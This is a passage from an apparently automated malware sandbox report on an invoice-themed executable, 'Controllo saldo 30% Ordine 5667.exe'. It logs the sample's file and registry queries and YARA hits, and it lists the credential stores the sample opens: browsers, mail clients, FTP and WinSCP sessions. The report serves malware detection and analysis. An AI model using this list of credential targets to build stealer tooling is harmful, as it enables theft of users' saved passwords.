                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeQueries volume information: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeQueries volume information: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05F84EF4 GetUserNameW,11_2_05F84EF4

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.691821194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.566316771.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.561644091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.560802331.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Controllo saldo 30% Ordine 5667.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: Yara matchFile source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
